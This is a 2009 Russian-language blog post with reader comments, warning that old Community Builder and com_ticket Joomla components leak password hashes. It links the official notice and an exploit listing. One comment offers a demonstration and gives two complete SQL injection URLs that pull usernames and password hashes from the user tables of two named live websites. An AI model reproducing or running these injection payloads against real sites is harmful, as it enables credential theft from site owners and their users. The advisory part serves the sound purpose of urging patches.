Уязвимости в CB 1.1 и com_ticket

На днях нашли критические уязвимости (через которые даже школьник может получить ваши хэши с паролями) в компоненте Community Builder до версии 1.1 и компоненте заказов билетов com_ticket до версии 2.1

Так что быстренько обновляем свои старые заброшенные сайты (CB 1.1 вышел около 2 лет назад, а com_ticket весьма редкое явление в рунете) и спокойно работаем дальше.

Новость на официальном сайте CB :

http://www.joomlapolis.com/index.ph...ive&task=view&cid=11&Itemid=68

Ссылка на уязвимость com_ticket

http://milw0rm.com/exploits/8999

Есть вопросы по архиву или нашли неработающую ссылку? - Напишите о проблеме в комментариях и мы быстро ее решим. Спасибо за внимание!

могу даже показать как это делается ;-)
Демонстрация для версии 2.1

ht*p://www.helendaleeducat ionfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+ 1,2,3,4,5,concat(use rname,0x3a,password),7,8 ,9,10,11,12,13,14,15,16,17,18+from+jos_user s/*

Демонстрация для версии 0.1

ht*p://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+ 1,2,3,4,5,concat(use rname,0x3a,password),7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_us ers/*

Цитировать

#2 artur 25.06.2009 11:48

Смею предположить - хэш достаётся через SQL инъекцию ...
80% взломов через компоненты джумлы происходит именно так

Цитировать

#1 Прохожий 25.06.2009 10:57

А откуда информация, что "даже школьник может"? Joomlapolis утверждает, что эксплойта в широком хождении среди киддисов нет, взлом был штучный (но дыра, тем не менее, есть).

Цитировать

Обновить список комментариев
RSS лента комментариев этой записи